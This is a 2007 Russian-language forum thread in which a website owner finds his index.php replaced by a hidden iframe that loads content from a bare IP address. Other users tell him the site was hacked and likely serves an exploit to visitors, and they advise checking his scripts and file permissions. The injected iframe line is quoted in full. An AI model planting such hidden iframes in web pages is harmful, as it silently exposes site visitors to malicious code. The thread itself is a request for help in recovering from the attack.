Emotion Опубликовано 4 мая, 2007 Жалоба Поделиться Опубликовано 4 мая, 2007 Есть сайт, написанный мною. Вчера я как обычно редактировал его одержимое. Сайт самый простой. Сегодня захожу, а он не грузится. Именно главная страница(index.php). Попробовал другие - всё ок. Смотрю инходній код, а там: <!-- o65 --><iframe src='http://203.223.158.12/t' width='6' height='6' style='visibility: hidden;'> </iframe><!-- c65 --> Что это такое, не понятно. Вместо всего этого должен быть php-код и html-код. Захожу по ftp на сервер - смотрю index.php - тоже самое. В последнее время пользуюсь программой Zend Studio. Пользоваться ей особо не умею. Всё на интуитивном уровне. Вопросы: 1)Что означает этот код? 2)Как он туда мог попасть? Например может как-то сама программа его туда прописала(вследствие моей неопытности работы с ней) или может кто-то специально прописал. Ссылка на комментарий Поделиться на другие сайты Поделиться
Darhazer Опубликовано 4 мая, 2007 Жалоба Поделиться Опубликовано 4 мая, 2007 Ваш сайт - взломали. Ктото добавил этот код чтоб загружал данний адрес ( наверника на нем експлойт ) пользвателям вашего сайта. Ссылка на комментарий Поделиться на другие сайты Поделиться
Strange_V Опубликовано 4 мая, 2007 Жалоба Поделиться Опубликовано 4 мая, 2007 Взломали. Проверьте все свои скрипты на безопасность, выставите правильные права доступа. Ссылка на комментарий Поделиться на другие сайты Поделиться
Emotion Опубликовано 4 мая, 2007 Автор Жалоба Поделиться Опубликовано 4 мая, 2007 (изменено) Посмотрел ещё одну вещь - на права доступа к файлам. Если смотрю index.php - у него стоит 644(public - только read). А если все файлы выделяю и смотрю, то 664(всем всё можно). Может в этом моя ошибка? Этим и воспользовались? И подскажите, какие права рекомендуется чтобы у меня стояли. Мне по идее можно всё. А остальным можно поставить только чтение? Изменено 4 мая, 2007 пользователем Emotion Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать учетную запись
Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти